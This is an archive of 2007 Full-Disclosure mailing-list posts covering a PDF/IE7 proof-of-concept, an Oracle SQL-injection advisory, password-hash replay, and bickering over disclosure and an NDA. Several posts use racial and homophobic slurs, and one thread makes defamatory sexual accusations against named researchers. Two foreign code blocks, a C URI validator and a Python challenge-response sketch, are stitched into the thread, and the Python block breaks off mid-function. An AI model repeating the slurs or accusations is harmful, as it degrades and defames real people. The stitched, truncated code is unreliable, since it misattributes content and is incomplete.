already
over matters, so I suggest you take this olive branch and return
to
Full-Disclosure discussing elite matters regarding cyber security
and
keeping off Bugtraq is a must see.

To be in a position of power on the mailing lists requires the
backing of
n3td3v, and if you agree then you'll have full power backing by me
to
continue your cyber politcal agenda on the mailing lists, without
n3td3v
criticism.

Thank you,

n3td3v


Re: [Full-disclosure] .aware eZine (beta edition)

2007-10-18 Thread full-disclosure

Let us know when the stable version is available.

On Thu, 18 Oct 2007 02:08:45 -0400 rattle [EMAIL PROTECTED] wrote:
Hello World!

I am posting this to inform you about the existence of a little eZine
called .aware, over at

 http://www.awarenetwork.org/etc/

The second issue was just released, namely

 http://www.awarenetwork.org/etc/beta/

Then, certain people suggested shameless advertising on some mailing
lists. So here we go, I did. Now read our exquisite eZine.

cheers,
rattle

--
# Public Key: http://www.awarenetwork.org/usr/rattle.asc
python -c print(lambda r:(lambda I:'\n'.join([''.join([(lambda
S,R:chr(32+(SR4)*(S+R2*r*(x+y(x**2+y**2,r**2) for x in I])
for y
in I]))(range(-4*r,4*r+1)))(6)


Re: [Full-disclosure] Your email requires verification.

2007-10-18 Thread full-disclosure

Huh?  I am a real person!

- -JPsometimes retarded, always consistent

On Thu, 18 Oct 2007 10:00:57 -0400 [EMAIL PROTECTED] wrote:
The message you sent requires you to verify that you
are a real live human being and not a spam source. To complete
this verification, simply reply to this message and include the
following verification code in the subject line:

verify#WzcntwThNFUdILsMWgOWTA3mj0COAK7v

The headers of the message sent from your address, which triggered
this verification process, are shown below. If you did not send
this message, you are in the unfortunate situation that someone
either hijacked your account or spoofs messages from it.

From [EMAIL PROTECTED] Thu Oct 18 10:00:57 2007
Received: from [65.39.178.135] (helo=smtp3.hushmail.com)
 by quagmire.lbccservers.com with esmtp (Exim 4.68)
 (envelope-from [EMAIL PROTECTED])
 id 1IiVvl-0003tS-Gm
 for [EMAIL PROTECTED]; Thu, 18 Oct 2007 10:00:57 -0400
Received: from smtp3.hushmail.com (localhost.hush.com [127.0.0.1])
   by smtp3.hushmail.com (Postfix) with SMTP id BED2E5C015
   for [EMAIL PROTECTED]; Thu, 18 Oct 2007 14:00:54 +
(UTC)
Received: from mailserver5.hushmail.com (mailserver5.hushmail.com
[65.39.178.19])
   by smtp3.hushmail.com (Postfix) with ESMTP;
   Thu, 18 Oct 2007 14:00:53 + (UTC)
Received: by mailserver5.hushmail.com (Postfix, from userid 65534)
   id E6F6C22840; Thu, 18 Oct 2007 14:00:52 + (UTC)
MIME-Version: 1.0
Date: Thu, 18 Oct 2007 10:00:52 -0400
To: full-disclosure@lists.grok.org.uk,[EMAIL PROTECTED]
Cc:
Subject: Re: [Full-disclosure] .aware eZine (beta edition)
From: [EMAIL PROTECTED]
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Message-Id: [EMAIL PROTECTED]


cheers,
rattle


Re: [Full-disclosure] Netgear SSL312 XSS vulnerability

2007-10-18 Thread full-disclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

What?

On Wed, 17 Oct 2007 14:15:31 -0400 [EMAIL PROTECTED] wrote:
Dear SkyOut, dear Packetstorm team (tedd :)) and dear List.

The author broke an NDA during the releasing of this uber-Advisory.

Skyout: What the fuck is wrong with u? Even ignoring our mails... wow?
We provided the Router, told him to take a look and he agreed to an
NDA.

Do I care if you release a XSS? Hell no...
But I care if you accepted an NDA because of other internal things.

Did you find it by yourself? Well not really... (We provided a router,
told you to take a look for XSS) Is it uber-critical? Not really
either... Could you've released it anyway? Sure.. but you didn't ask
and pissed off about 9 different people.

Skyout: And for what? For an Advisory about a XSS... great job.

Btw: Cryptocrew Members: This guy is seriously NOT trustworthy.
I just mention it in case you may consider to hire him

This XSS is nothing we wanna sue you for but an NDA is an NDA.
And if you come along and tell me Well I didn't sign anything I've
at least 7 people handy who can ensure that you agreed to an NDA.

An NDA is an NDA that's what you need to learn Skyout, rly..

If you start talking about other internal things be sure we'll consider
to take further steps and because you don't answer any mail let me
mention that in here

And dear list: It's nothing about the XSS but about the NDA he broke
to release it... I'm sure if he wants to take his postings as reference
this should get mentioned either


Kind regards,
Rembrandt (+ the friends you had)

p.s.
Greets go to t3c0 who noticed the XSS at first but had no time to write
about it (and no serious interest).
This should get mentioned as well so hopefully some archives update
their news.
And Skyout.. I told ya you're not the first who analyses it.



Re: [Full-disclosure] peace

2007-10-18 Thread full-disclosure

One word replies are unnecessary on the full-disclosure.

On Thu, 18 Oct 2007 12:15:52 -0400 Nikolay Kichukov
[EMAIL PROTECTED] wrote:
so?

-Nikolay

fabio wrote:
 https://intranet.usip.org/datacenter/eps/CustomCal.php



Re: [Full-disclosure] Zone-H.org: 10 reasons websites get hacked

2007-10-18 Thread full-disclosure

very thought provoking as usual bro thank you for your
contributions to our list!

On Thu, 18 Oct 2007 15:16:08 -0400 worried security
[EMAIL PROTECTED] wrote:
On 10/18/07, [EMAIL PROTECTED] full-[EMAIL PROTECTED] wrote:

 I thought the main reasons for intrusion were fun and/or profit.  I
 don't see them on your list anywhere.

 I think your list sucks.


the no.1 threat to corporate and national security is in fact the
inside job.

yep folks, terrorists are actively seeking to trick the job vetting
processes for power plants, government etc etc.

because the terrorists know the key systems aren't connected to the
internet.

but after reading media reports, it seems the department of homeland
security are thinking if we're not connected to the internet then
we're safe.

no, even permanently offline systems, still need to be patched from
internet threats, because terrorists are actively seeking to get into
key infrastructure jobs with portable disks to infect computers with
the latest 0-day posted to places such as Full-Disclosure.

yep folks, all security pros on here will have seen the dhs propaganda
video by now about the turbine getting shutdown with a cyber attack,
and the dhs are focusing on internet facing systems, but the real
threat to corporate and national security is the inside job of
permanently offline systems that the power plants, government etc etc
think are safe and don't need patched.

what i'm saying is, for example, i'm not saying they use microsoft for
key infrastructure systems, but a permanently offline system still
needs to be fully patched after every patch tuesday, even though that
system is permanently offline and will never ever be connected to the
internet.

that is my key problem i'm seeing right now by the government in
respect of cyber security, they are assuming an internet connection
needs to be there, but that isn't entirely true.

if mr joe jobs wanna be terrorist manages to trick your job vetting
processes and gets a job with access to the key systems, yes folks,
terrorists haven't got time to fiddle around with computers, they will
download exploit code from Full-Disclosure type sources and throw it on
a portable disk, then go for an inside job social engineering trick and
get into a power plant, government etc etc job.

so having your permanently offline key infrastructure not patched every
patch tuesday for example, is pretty bad, because if your permanently
offline systems had been patched, then mr joe jobs wanna be terrorist
wouldn't have been able to plug in a portable disk into your systems
based on a 0-day exploit originally posted on Full-Disclosure and shut
the place down.

while the internet is one way to get exploit code into your network,
it's not the only way.

joe jobs wanna be terrorist would rather do an inside job, than fiddle
around with computers all day.

in short your permanently offline systems still need to be patched
every patch tuesday.

do the power plants, government etc etc have their patches up to date
for permanently offline systems? ;) they assume only internet facing
systems need to be patched from internet threats, but that is their
delusion not mine.

like in this link, http://www.news.com/8301-10784_3-9799403-7.html they
keep saying cyber as in internet... but the truth is a terrorist attack
to take out key power plants, government etc etc would come from the
inside job...

the government are wasting their time with the whole cyber security
thing, while the exploit code carried on portable disks would originate
from internet sources and that that exploit code may have originally
needed an internet connection, that is not entirely true if portable
disks are used and the joe jobs wanna be terrorists target permanently
unpatched, permanently offline systems.

did you sit smugly in your control rooms smiling at that permanently
offline system and think, hey, nothing posted on Full-Disclosure can
touch this? think again.

n3td3v


Re: [Full-disclosure] password plugin for linux?

2007-10-18 Thread full-disclosure

ask john hale

On Thu, 18 Oct 2007 11:11:24 -0400 . / [EMAIL PROTECTED] wrote:
hi all,

naive question - but you know how i can load password plugins in windows
to capture password changes in the clear. is there any way to achieve the
same in linux? atm all i can think of (naively as i said) is to monitor
the shadow file or whatever and then insert fav technique here to open
the hash. but i am really trying to achieve a near realtime understanding
of password changes on the system side, so i can sync them out to apps or
systems or whatever.

are there pam's out there that do this? or maybe there are rootkits that
can do this, that i could cannibalise the password stuff out of to
pam-ify it. i'm not looking to write anything nasty here - just think
password sync-ing, without like a managed enterprise approach like NIS or
LDAP auth or whatever.

any thoughts would be appreciated :)


david.


Re: [Full-disclosure] Third-party patch for CVE-2007-3896, UPDATE NOW

2007-10-17 Thread full-disclosure

Nice catch.

On Wed, 17 Oct 2007 08:16:21 -0400 KJK::Hyperion [EMAIL PROTECTED] wrote:
KJK::Hyperion wrote:
 The present patch is dramatically under-tested and it has undergone no
 quality assurance procedure whatsoever, so please deploy with the
 greatest care.

Indeed, I just found a gruesome memory leak in it. A silly bug, brown
paperbag-grade shame. If you installed my patch, upgrade RIGHT THIS
MOMENT NOW or slowly die:

http://spacebunny.xepher.net/hack/shellexecutefiasco/

For the press guys watching: THIS IS VERY IMPORTANT, more important than
the original patch was. I don't expect shitty patch actually shitty to
seriously make the big headlines, but, hey, a heads up: there is a good
reason Microsoft takes a lot of time to put patches out, after all. I
don't do this for the reputation, either: I already made a U-turn on my
feelings about the vulnerability, I'm not too proud to admit my mistakes
(god knows how big the egos can get in FD)


Re: [Full-disclosure] OMG - I just won the lottery! For real!!11!

2007-10-17 Thread full-disclosure

Dear Dude VanWinkle,

I find your alias offensive.


On Wed, 17 Oct 2007 13:31:32 -0400 nigger johnson
[EMAIL PROTECTED] wrote:
Although ... I dont remember entering this lottery - because I
havent been
18 that long and it wouldnt be legal!?
no one cares. next time send your nudes kthx.


Re: [Full-disclosure] SQL Injection Flaw in Oracle Workspace Manager

2007-10-17 Thread full-disclosure

Yessir.

On Wed, 17 Oct 2007 10:27:49 -0400 David Litchfield [EMAIL PROTECTED] wrote:
(resend with title...)

NGSSoftware Insight Security Research Advisory

Name: SQL Injection Flaw in Oracle Workspace Manager
Systems Affected: Oracle 10g release 1 and 2, Oracle 9i
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ [EMAIL PROTECTED] ]
Reported: 22nd August 2006
Date of Public Advisory: 17th October 2007
Advisory number: #NISR17102007B


Description
***
The Workspace Manager in Oracle 10g release 1 and 2 and Oracle 9i is
vulnerable to SQL injection.

Details
***

The Workspace Manager, owned by SYS, contains a package called LT. This
package is owned and defined by the SYS user and can be executed by PUBLIC.
LT contains a procedure called FINDRICSET which calls the FINDRICSET package
in the LTRIC package. This is vulnerable to SQL injection and can be abused
by an attacker to gain SYS privileges.


Fix Information
***
Oracle was alerted to this flaw on the 22nd of August 2006. A patch has now
been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner
designed specifically for Oracle, can be used to accurately determine
whether your servers are vulnerable to this flaw. More information about
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php


About NGSSoftware
*
NGSSoftware develops vulnerability assessment and compliancy tools for
database servers including Oracle, Microsoft SQL Server, DB2, Sybase and
Informix. Headquartered in the United Kingdom NGS has offices in London,
St. Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United
States; NGSConsulting provide services to some of the largest and most
demanding organizations around the globe.
http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076
[EMAIL PROTECTED]


Re: [Full-disclosure] 0-day PDF exploit

2007-10-17 Thread full-disclosure

They are just covering their asses in case someone figures out a
scenario where this bug is actually useful, and tries going on a
media whoring campaign talking about how evil Adobe is for not
originally rating the vulnerability higher.

You bunch of whiny, prissy homo fucks.

On Wed, 17 Oct 2007 11:26:15 -0400 Justin Klein Keane [EMAIL PROTECTED] wrote:
Adobe has a work around (but doesn't seem to have a fix yet) for this
vulnerability (which they categorize as critical).  They also state
(and testing seems to validate) that impact is limited to Windows XP
machines with IE 7.

http://www.adobe.com/support/security/advisories/apsa07-04.html


Justin C. Klein Keane

Sr. Programmer Analyst and Information Security Specialist
University of Pennsylvania
School of Arts and Sciences Computing
3600 Market St.
Philadelphia, PA 19104

[EMAIL PROTECTED] wrote:
 Why everybody said it is a zero day about PDF? it's just a fault in
 IE7, or just want to make a big media hit? real PDF zero day will
 exists in the PDF's file format, or some Adobe's expanded functions.

 Actually, it's about PDF *and* IE7.  Both are at fault, and if either
 one of them was doing the right thing, the exploit would fail.

 The first fault is Adobe's.  Because it's their code that first
 acquires the input from the attacker, it's their job IMHO to validate
 it properly, but they don't.  Instead, they turn around and tell
 Windows to open the bogus URI.

 The second fault is IE7's.  The protocol handler used to fail
 gracefully by rejecting this kind of malformed URI, but now it
 doesn't.  The new behavior is to turn around and call ShellExecute()
 with data taken from the URI.

 I prefer to think of it this way: Adobe's code has been doing the
 wrong thing for years, and they've gotten lucky.  But now, a new bug
 in IE7 has come along which makes the old bug in Adobe's code
 exploitable.

 - Eric




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
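
Eric's point in the message above, that the program which first receives a link from an untrusted document should validate it before asking Windows to open it, sketched as an added example (not code from Adobe, Microsoft or any poster in this thread). The function name `uri_safe_to_launch`, the scheme allowlist and the length limit are assumptions, and the sample URIs are constructed.

```c
/* Added example: strict check of a document-supplied URI before it is
 * handed to the operating system (for instance to ShellExecute()).
 * Allowlist and length limit are assumptions chosen for illustration. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define URI_MAX_LEN 2048                      /* assumed upper bound */

static const char *const ALLOWED_SCHEMES[] = { "http", "https", "mailto" };

/* Case-insensitive compare of the first n bytes of a with all of b. */
static int scheme_equals(const char *a, size_t n, const char *b)
{
    size_t i;
    if (strlen(b) != n)
        return 0;
    for (i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != b[i])
            return 0;
    return 1;
}

static int hex_value(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Returns 1 if the URI may be passed on to the OS, 0 if it must be refused. */
int uri_safe_to_launch(const char *uri)
{
    const char *colon, *rest, *p;
    size_t len, i, scheme_len;
    int known = 0;

    if (uri == NULL)
        return 0;
    len = strlen(uri);
    if (len == 0 || len > URI_MAX_LEN)
        return 0;

    /* 1. A scheme must be present and on the allowlist. */
    colon = strchr(uri, ':');
    if (colon == NULL || colon == uri)
        return 0;
    scheme_len = (size_t)(colon - uri);
    for (i = 0; i < sizeof ALLOWED_SCHEMES / sizeof ALLOWED_SCHEMES[0]; i++)
        if (scheme_equals(uri, scheme_len, ALLOWED_SCHEMES[i]))
            known = 1;
    if (!known)
        return 0;

    /* 2. Only printable ASCII that RFC 3986 permits; every '%' must start
     *    a two-digit hex escape that does not decode to a control byte. */
    rest = colon + 1;
    if (*rest == '\0')
        return 0;
    for (p = rest; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        if (c <= 0x20 || c >= 0x7f)
            return 0;
        if (strchr("\"<>\\^`{|}", c) != NULL)
            return 0;
        if (c == '%') {
            int hi = hex_value((unsigned char)p[1]);
            int lo = hi < 0 ? -1 : hex_value((unsigned char)p[2]);
            if (hi < 0 || lo < 0)
                return 0;
            if (hi * 16 + lo < 0x20 || hi * 16 + lo == 0x7f)
                return 0;
            p += 2;
        }
    }

    /* 3. Web links need an authority part: scheme://host... */
    if (!scheme_equals(uri, scheme_len, "mailto")) {
        if (strncmp(rest, "//", 2) != 0 || rest[2] == '\0' || rest[2] == '/')
            return 0;
    }
    return 1;
}

int main(void)
{
    /* Constructed sample links, not taken from any real document. */
    const char *samples[] = {
        "https://example.com/docs?id=1",
        "mailto:user@example.com",
        "mailto:user%zz@example.com",     /* '%' without two hex digits */
        "http://example.com/a b",         /* raw space */
        "file:///C:/Windows/notepad.exe"  /* scheme not on the allowlist */
    };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-34s %s\n", samples[i],
               uri_safe_to_launch(samples[i]) ? "launch" : "reject");
    return 0;
}
```

Refusing the link outright, rather than trying to repair it, keeps the decision in the application that parsed the document instead of relying on whichever protocol handler is registered on the machine.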


[Full-disclosure] Most Secure Browser

2007-10-17 Thread full-disclosure

Dear List,

I am currently tasked with evaluating which webbrowser is the most
secure, to be deployed across all machines at the fortune 500
corporation I'm currently working at.  Can you, armchair security
enthusiast and full-disclosure reader, assist me in this endeavor?

I am looking for:

1) Personal favorite browser,
2) Most secure browser,
3) Best browser plugins,
4) Favorite youtube video,
5) Best browsing policies

Thanks and good night.


Re: [Full-disclosure] Netscape Navigator 9.0 fixes several vulnerabilities

2007-10-17 Thread full-disclosure

In your professional opinion, is upgrading to the latest version
the best decision?  Or is there a better browser to use?

-JPelinks4lyfe

On Wed, 17 Oct 2007 11:55:28 -0400 Juha-Matti Laurio juha-[EMAIL PROTECTED] wrote:
It appears that new version of Netscape has been released.

More information at

Release Notes :: Netscape Navigator Web Browser
http://browser.netscape.com/releasenotes/

New Netscape Navigator 9 ships security fixes and is multi-platform
http://blogs.securiteam.com/?p=1019

The new version is based on Mozilla Firefox 2.0.0.7 codebase
(from UA: rv:1.8.1.8pre Gecko/20071015 Firefox/2.0.0.7 Navigator/9.0).

Solution:
Upgrade to version Netscape Navigator 9.0
http://browser.netscape.com/downloads/

- Juha-Matti


[Full-disclosure] Fwd: To the list admin: address change.

2007-10-17 Thread full-disclosure

John,

I believe I digitally intercepted this blackberry user's email.


- Forwarded message from [EMAIL PROTECTED] -
Please change my subscription address to:

[EMAIL PROTECTED]

Thank you!

Erik Laykin
Sent via BlackBerry by ATT

-Original Message-
From: [EMAIL PROTECTED]
Date: Wed, 17 Oct 2007 14:10:13
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Most Secure Browser

Dear List,

I am currently tasked with evaluating which webbrowser is the most
secure, to be deployed across all machines at the fortune 500
corporation I'm currently working at.  Can you, armchair security
enthusiast and full-disclosure reader, assist me in this endeavor?

I am looking for:

1) Personal favorite browser,
2) Most secure browser,
3) Best browser plugins,
4) Favorite youtube video,
5) Best browsing policies

Thanks and good night.


Re: [Full-disclosure] Zone-H.org: 10 reasons websites get hacked

2007-10-17 Thread full-disclosure

I thought the main reasons for intrusion were fun and/or profit.  I
don't see them on your list anywhere.

I think your list sucks.


On Wed, 17 Oct 2007 16:46:35 -0400 Juha-Matti Laurio juha-[EMAIL PROTECTED] wrote:
This is dated 10th Oct but always useful:

Zone-H.org - 10 reasons websites get hacked
http://www.zone-h.org/content/view/14865/1/

based on OWASP Top 10 list.

- Juha-Matti


Re: [Full-disclosure] Most Secure Browser

2007-10-17 Thread full-disclosure

Thanks bud.

Incidentally, we have been seeing a lot of s0ftpj.org posts lately -
 is your hacker group trying to make a comeback?  If so, why?

I think r00tabega should return as well!

-JPscene historian is written between my bra and ket lulz!

On Wed, 17 Oct 2007 19:54:45 -0400 vecna [EMAIL PROTECTED] wrote:
Hi,

 I am currently tasked with evaluating which webbrowser is the most
 secure, to be deployed across all machines at the fortune 500
 corporation I'm currently working at.  Can you, armchair security
 enthusiast and full-disclosure reader, assist me in this endeavor?

 I am looking for:

 1) Personal favorite browser,

firefox, for the plugins support

 2) Most secure browser,

opera, because is the less used at the moment :)

 3) Best browser plugins,

mixtab

 4) Favorite youtube video,

what's matter ? is for a psy profiling analysis ?
anyway:
http://www.youtube.com/watch?v=K2cYWfq--Nw

 5) Best browsing policies

a lot of tab (20 - 50) for collect in the day and read after.



 Thanks and good night.

you too.


Re: [Full-disclosure] pdp architect, drraid, beastiality, and incest

2007-10-16 Thread full-disclosure

What have you ever done for security

On Tue, 16 Oct 2007 01:13:41 -0400 scott [EMAIL PROTECTED] wrote:
Do you understand the concept of protecting people and corporations from
total idiots trying to gain access to their systems? PDP just lets others
know what he found, while the offending company is working on a fix, in a
minimal way.

If you were a true researcher, you should be able to find the same with
the clues he provides. Yay for PDP not feeding script kiddies!



phioust wrote:
 While it may be immature to make fun of pdp architect and drraid
about
 incest and beastiality while its probably not true, I still
wonder why they
 would post info about vulnerabilities only to not release them.
The only
 thing i can think of is 'fame' and its obviously working against
them.

 *pdp architect, drraid, beastiality, and incest*

 On 10/15/07, scott [EMAIL PROTECTED] wrote:

 Why don't you grow up and go away!


 [EMAIL PROTECTED] wrote:

 What do these things have in common?

 Well for one pdp and drraid share an extremme fetish for sick
porn,
 but also they love to post info on future ( read non-
existant )
 0day/exploits that they have possession of. As noted in
previous
 research [1] drraid posted claims of ssh 0day [2] which were
never
 verified and no advisory has been made. Our email to Avert
labs at
 McAfee went unanswered. We still wonder why its employees are
 holding 0day information from the public.

 We also wonder why pdp architect ( incest fetish lover ) makes
 similar types of posts [3] about skype when he works for a
 pentration testing company. We have also heard news that pdp
is
 using 0day xss bugs in incestboards.com to view the members
only
 board where he shares stories about love affaris between him,
his
 dog, and his grandfather.

 To pdp architect: incest isnt natural no matter how good it
feels.
 [4]

 ps: many lulz @ [5]

 [1] http://seclists.org/fulldisclosure/2007/Sep/0705.html
 [2] http://drraid.blogspot.com/2007/09/ssh-keep-it-secret.html
 [3] http://www.gnucitizen.org/about/pdp#comment-50201
 [4] http://www.way2hope.org/incest_survivors_help.htm
 [5] http://www.gnucitizen.org/about/pdp#comment-3

 imul martinez (heil brazil)
 (imul AT hushmail DOT com)
 Food Director of lul-disclosure Corp.


Re: [Full-disclosure] 0-day PDF exploit

2007-10-16 Thread full-disclosure

Dear 3APAPA,

Please configure your Internet Exploring mechanisms in a fashion
compliant with my exploitation technologies to demonstrate the
severity of my proof of concept attack tools.  Here is a list of
criteria to fulfill to make the hacker attack possible.  This is
severe!  Millions who follow the instructions in detail might be
vulnerable under the right situations sometimes... yawn.

-JPi dont use apostrophes

On Tue, 16 Oct 2007 11:27:23 -0400 [EMAIL PROTECTED] wrote:
...some additional information about 0day PDF exploit PoC:

Please download and open PDF PoC _locally_ in Adobe Acrobat (not in Adobe
Acrobat ActiveX control because of some internal restrictions within Adobe
ActiveX, it may be bypassed via:
http://seclists.org/bugtraq/2007/Oct/0213.html but i didn't make tests).

Also make sure that mailto handler is set to Internet Explorer 7 (any 3rd
party mail clients are not installed).

PoC tested on WinXP SP2 Eng updated + Internet Explorer 7 + Adobe Acrobat
Reader 8.1

PoC: http://security.fedora-hosting.com/0day/pdf/pdf_poc.pdf
Details: http://security.fedora-hosting.com/0day/pdf/pdf_poc.txt


regards,
cyanid-E [EMAIL PROTECTED]


[Full-disclosure] Fwd: Experience masturbation like never before.

2007-10-16 Thread full-disclosure

Why am I getting emails like this?

- Forwarded message from Alexander Murdock [EMAIL PROTECTED] -
It so hard to find a virgin nowadays. With the Personal Puss! your
dreams come true! Ordering your Personal Puss! you'll receive a
virgin pussy and experience new sensations of breaking the hymen.
   Try this really amazing Personal Puss! that gives you a
sensation of a nice hot and gooey pussy. Designed to be soft
stretchable and allow you a proper firm grip, it is made of the
best modern materials, safe and non-allergic.

http://dbbride.com

 Your own Personal Puss! is just waiting for you.


Re: [Full-disclosure] pdp architect, drraid, beastiality, and incest

2007-10-16 Thread full-disclosure

LOL

On Tue, 16 Oct 2007 12:35:57 -0400 Morning Wood [EMAIL PROTECTED] wrote:
 Do you understand the concept of protecting people and corporations from
 total idiots trying to gain access to their systems? PDP just lets others
 know what he found, while the offending company is working on a fix, in a
 minimal way.

 If you were a true researcher, you should be able to find the same with
 the clues he provides. Yay for PDP not feeding script kiddies!


dunno but every sec researcher I know in the private sector would never
release any info without it being fully authorized by his / her employer.

Possibly we will see these idiots looking for a new job soon?


Re: [Full-disclosure] 0-day PDF exploit

2007-10-16 Thread full-disclosure

You're about as funny as the severity of your hacking tools or
something.

On Tue, 16 Oct 2007 13:07:48 -0400 [EMAIL PROTECTED] wrote:
negative. just a ':' and ')' concatenated characters

with love,
cyanid-E

2007/10/16, [EMAIL PROTECTED] full-[EMAIL PROTECTED]:

 Theoretically that is a smiley face right?

 On Tue, 16 Oct 2007 11:56:47 -0400 [EMAIL PROTECTED] wrote:
 :)

 2007/10/16, [EMAIL PROTECTED] full-[EMAIL PROTECTED]:

  Dear 3APAPA,

  Please configure your Internet Exploring mechanisms in a fashion
  compliant with my exploitation technologies to demonstrate the
  severity of my proof of concept attack tools.  Here is a list of
  criteria to fulfill to make the hacker attack possible.  This is
  severe!  Millions who follow the instructions in detail might be
  vulnerable under the right situations sometimes... yawn.

  -JPi dont use apostrophes

  On Tue, 16 Oct 2007 11:27:23 -0400 [EMAIL PROTECTED] wrote:
  ...some additional information about 0day PDF exploit PoC:

  Please download and open PDF PoC _locally_ in Adobe Acrobat (not in
  Adobe Acrobat ActiveX control because of some internal restrictions
  within Adobe ActiveX, it may be bypassed via:
  http://seclists.org/bugtraq/2007/Oct/0213.html but i didn't make
  tests).

  Also make sure that mailto handler is set to Internet Explorer 7 (any
  3rd party mail clients are not installed).

  PoC tested on WinXP SP2 Eng updated + Internet Explorer 7 + Adobe
  Acrobat Reader 8.1

  PoC: http://security.fedora-hosting.com/0day/pdf/pdf_poc.pdf
  Details: http://security.fedora-hosting.com/0day/pdf/pdf_poc.txt


  regards,
  cyanid-E [EMAIL PROTECTED]


Re: [Full-disclosure] Fwd: Experience masturbation like never before.

2007-10-16 Thread full-disclosure

hahahahahahaha good one

On Tue, 16 Oct 2007 13:05:56 -0400 Brandon S. Allbery KF8NH [EMAIL PROTECTED] wrote:
On Oct 16, 2007, at 11:55 , [EMAIL PROTECTED] wrote:
 Why am I getting emails like this?

cynic because f-d is 99% wanking anyway? /cynic

--
brandon s. allbery [solaris,freebsd,perl,pugs,haskell] [EMAIL PROTECTED]
system administrator [openafs,heimdal,too many hats] [EMAIL PROTECTED]
electrical and computer engineering, carnegie mellon university    KF8NH


Re: [Full-disclosure] Fwd: Experience masturbation like never before.

2007-10-16 Thread full-disclosure

What is it then?

On Tue, 16 Oct 2007 13:57:55 -0400 [EMAIL PROTECTED] wrote:
On Tue, 16 Oct 2007 11:55:17 EDT, [EMAIL PROTECTED] said:
 Why am I getting emails like this?

Obviously, the spammers have learned the secret of targeted marketing.


Re: [Full-disclosure] 0-day PDF exploit

2007-10-16 Thread full-disclosure

with all the conditions that need to be met, and the fact that it
is still going to be user assisted wouldn't it be easier to just
get the targeted user to run the executable directly?

i suppose with this xss/xsrf/b4b0 tactic you can bypass the
firewalls at least and militarily grade brute force the login for
the win.

whatever pays the bills bro.

On Tue, 16 Oct 2007 14:25:52 -0400 [EMAIL PROTECTED] wrote:
no, it's my PoC exploit and product of my researching based on public
information that pdp given in his blog

regards,
cyanid-E

2007/10/16, phioust [EMAIL PROTECTED]:

 is pdp architect releasing more 0day into the wild without his company's
 knowledge? I think this breaks the contract from any serious security
 company.  I believe a message from him explaining his positions on such
 things is appropriate or maybe a message from his employer about their
 disclosure policies?

 On 10/16/07, [EMAIL PROTECTED]  [EMAIL PROTECTED] wrote:
 
  Zero day PDF exploit for Adobe Acrobat
 
  Workaround:
 
  Currently unavailable.
 
  Thanks to:
 
  pdp (at) gnucitizen.org for his investigation
 



Re: [Full-disclosure] Fwd: Experience masturbation like never before.

2007-10-16 Thread full-disclosure

Who?

On Tue, 16 Oct 2007 14:29:21 -0400 Dude VanVinkle
[EMAIL PROTECTED] wrote:
Someone on FD works for Yambo Financials. lulz

- JP.

On 10/16/07, [EMAIL PROTECTED] full-[EMAIL PROTECTED] wrote:
 What is it then?

 On Tue, 16 Oct 2007 13:57:55 -0400 [EMAIL PROTECTED] wrote:
 On Tue, 16 Oct 2007 11:55:17 EDT, [EMAIL PROTECTED] said:
  Why am I getting emails like this?
 
 Obviously, the spammers have learned the secret of targeted marketing.


Re: [Full-disclosure] password hash, funny myth in the industry!

2007-10-16 Thread full-disclosure

Hi 3APAPA,

On Tue, 16 Oct 2007 15:30:56 -0400 Bipin Gautam
[EMAIL PROTECTED] wrote:
hi list,
i was reading the article, http://www.f-secure.com/weblog/archives/1293.html
but just an example.

blah blah blah, this is full-disclosure not some dear diary/myspace
bullshit,

why do many people out there think password hash can't be as good as
the password itself and needs to be computed/cracked first before it
can be used?

dunno why don't you tell me?

Consider the fact, many websites/forums don't use password hash+salt,
just password hash( generally SHA1, MD5) that gets computed client
side and POSTED to the web-forum for user authentication.

done

If someone can sniff this, given that, user name is available using
simple GUI tools as 'Tamper Data' ( firefox plug in ) even a low tech
malicious user can log on with someone's credentials without having to
crack the password hash, instead just using the password hash itself
manipulating the POST request.

makes sense? :)

no please clarify!!!

thanks,
-bipin



Re: [Full-disclosure] password hash, funny myth in the industry!

2007-10-16 Thread full-disclosure

Revolutionary wording!

On Tue, 16 Oct 2007 15:46:20 -0400 Thierry Zoller
[EMAIL PROTECTED] wrote:
BG makes sense? :)
Holds true for authentication schemes not designed to be protected
against Replay attacks.

Challenge-Response - DH -

--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

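The replay problem described in this thread (a client-side hash POSTed as the credential) and the challenge-response fix named in the reply above, as an added example that is not code from any poster. The class names, the PBKDF2 parameters and the sample account are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

PBKDF2_ROUNDS = 100_000  # assumption: illustrative work factor, not from the thread


class StaticHashLogin:
    """Scheme from the thread: the browser POSTs SHA1(password), the server compares."""

    def __init__(self):
        self._stored = {}

    def register(self, user, password):
        self._stored[user] = hashlib.sha1(password.encode()).hexdigest()

    def login(self, user, posted_hash):
        stored = self._stored.get(user)
        return stored is not None and hmac.compare_digest(stored, posted_hash)


def derive_key(password, salt):
    """Salted, slow key derivation; client and server both compute this."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class ChallengeResponseLogin:
    """Server issues a single-use nonce; the client proves knowledge of the key."""

    def __init__(self):
        self._users = {}    # user -> (salt, derived key)
        self._pending = {}  # user -> outstanding nonce

    def register(self, user, password):
        salt = secrets.token_bytes(16)
        self._users[user] = (salt, derive_key(password, salt))

    def challenge(self, user):
        nonce = secrets.token_bytes(16)
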